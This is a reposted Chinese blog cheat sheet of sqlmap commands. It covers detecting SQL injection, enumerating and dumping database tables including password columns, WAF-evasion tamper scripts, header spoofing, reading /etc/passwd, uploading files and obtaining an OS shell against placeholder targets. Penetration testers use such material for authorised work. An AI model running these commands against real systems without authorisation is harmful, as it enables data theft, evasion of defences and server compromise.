欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 房产 > 建筑 > sqlmap基础命令总结

sqlmap基础命令总结

2025/4/2 2:56:45 来源:https://blog.csdn.net/w2361734601/article/details/146717773  浏览:    关键词:sqlmap基础命令总结

​注意事项:仅用于授权测试,避免非法使用。

目录

​一、基础命令

​二、数据库信息获取

​三、绕过 WAF/IDS

​四、文件系统与系统命令

​五、高级功能与优化

​六、实战示例


一、基础命令
  1. 检测注入点

    sqlmap -u "http://target.com/index.php?id=1" --batch  # 自动检测注入点[2,4](@ref)
    • --batch:自动选择默认选项,无需交互。
    • --cookie="PHPSESSID=xxx":处理 Cookie 注入。
  2. 指定请求类型

    sqlmap -u "http://target.com/login.php" --data="username=admin&password=123"  # POST 请求注入[2,5](@ref)
    • --method=POST:强制指定请求方式。
    • --random-agent:随机 User-Agent 绕过检测。
  3. 代理与伪装

    sqlmap -u "http://target.com" --proxy="http://127.0.0.1:8080"  # 使用代理隐藏 IP[3,5](@ref)
    • --referer="http://baidu.com":伪造 Referer 头

二、数据库信息获取
  1. 枚举数据库

    sqlmap -u "http://target.com" --dbs  # 列出所有数据库[2,4](@ref)
    sqlmap -u "http://target.com" --current-db  # 获取当前数据库名[2,4](@ref)
  2. 表与字段操作

    sqlmap -u "http://target.com" -D database_name --tables  # 列出指定数据库的表[2,4](@ref)
    sqlmap -u "http://target.com" -D database_name -T users --columns  # 查看表结构[2,4](@ref)
  3. 数据提取

    sqlmap -u "http://target.com" -D database_name -T users -C username,password --dump  # 导出指定字段数据[2,4](@ref)

三、绕过 WAF/IDS
  1. TAMPER 脚本绕过

    sqlmap -u "http://target.com" --tamper="space2comment,base64encode"  # 变形 SQL 语句[1,3,5](@ref)
    • 常用脚本:space2comment(空格转注释)、apostrophemask(引号编码)。
  2. 其他绕过参数

    sqlmap -u "http://target.com" --level=3 --risk=3  # 提高测试深度与风险等级[4,5](@ref)

四、文件系统与系统命令
  1. 文件读写

    sqlmap -u "http://target.com" --file-read="/etc/passwd"  # 读取服务器文件(需高权限)[3,4](@ref)
    sqlmap -u "http://target.com" --file-write="local.txt" --file-dest="/remote/path"  # 上传文件[4,5](@ref)
  2. 获取系统权限

    sqlmap -u "http://target.com" --os-shell  # 尝试获取系统 Shell(需 FILE 权限)[2,4](@ref)
    sqlmap -u "http://target.com" --os-cmd "whoami"  # 执行系统命令[2,4](@ref)

五、高级功能与优化
  1. 性能优化

    sqlmap -u "http://target.com" --threads=5 --delay=2  # 设置线程数及延迟[3,5](@ref)
    sqlmap -u "http://target.com" -o  # 开启默认性能优化[1,3](@ref)
  2. 自定义检测与输出

    sqlmap -u "http://target.com" -v 6  # 显示完整 HTTP 响应内容[5](@ref)
    sqlmap -r request.txt  # 从文件加载 HTTP 请求[3,4](@ref)

六、实战示例

目标:从注入到获取数据

  1. 检测注入点
    sqlmap -u "http://target.com?id=1" --batch
  2. 提取数据库名
    sqlmap -u "http://target.com?id=1" --dbs
  3. 导出管理员密码
    sqlmap -u "http://target.com?id=1" -D target_db -T users --dump

 

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词